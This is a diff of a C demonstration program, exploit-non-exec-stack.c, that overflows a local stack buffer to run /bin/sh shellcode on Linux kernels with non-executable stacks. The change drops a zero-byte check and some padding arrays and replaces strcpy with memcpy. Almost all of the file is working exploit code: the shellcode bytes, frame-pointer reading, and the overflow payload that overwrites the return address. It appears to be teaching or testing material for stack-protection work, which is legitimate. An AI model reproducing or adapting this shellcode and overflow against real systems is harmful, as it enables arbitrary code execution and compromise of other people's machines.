@@ -1,6 +1,6 @@
 /*
- * $Name: release2_0-12 $
- * $Id: exploit-non-exec-stack.c,v 1.5 2001/06/19 18:22:16 ttsai Exp $
+ * $Name: release2_0-16 $
+ * $Id: exploit-non-exec-stack.c,v 1.6 2002/06/12 20:30:37 ttsai Exp $
  */
 
 
@@ -19,24 +19,10 @@
 #define SIZE 512
 #define readRegister(var,reg) __asm__ __volatile__("movl %%" #reg ", %0": "=r" (var))
 
-/*
- * If you get a "zero in pattern" warning and 28<=index<32, try uncommenting
- * the following line.
- */
-//char c[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";
-
-char dummy1[] = "a";
 char shellcode[] =
     "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
     "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
     "\x80\xe8\xdc\xff\xff\xff/bin/sh";
-char dummy2[] = "a";
-
-/*
- * If you get a "zero in pattern" warning and 20<=index<28, try uncommenting
- * the following line.
- */
-//char b[4];
 
 char pattern[SIZE];
 char buf[SIZE];
@@ -44,7 +30,7 @@ char buf[SIZE];
 int main(int ac, char *av[])
 {
     char a[10];
-    int fp, i, offset;
+    int fp, offset;
 
     /*
      * read the contents of the frame pointer into variable 'fp'.
@@ -58,12 +44,6 @@ int main(int ac, char *av[])
     *(int *) (pattern + offset + 8) = (int) &buf;
     *(int *) (pattern + offset + 12) = (int) &shellcode;
     pattern[offset + 16] = '\0';
-    for (i = 0; i < offset + 16; i++) {
-	if (pattern[i] == '\0') {
-	    printf("zero in pattern (index=%d).\n", i);
-	    exit(1);
-	}
-    }
 
     printf("This program demonstrates how a (stack) buffer overflow\n");
     printf("can attack linux kernels with *non-executable* stacks.\n");
@@ -72,10 +52,7 @@ int main(int ac, char *av[])
     printf("Press any key to continue...");
     getchar();
 
-    strcpy(a, pattern);
+    memcpy(a, pattern, offset+16);
 
     return 0;
 }
-
-
-
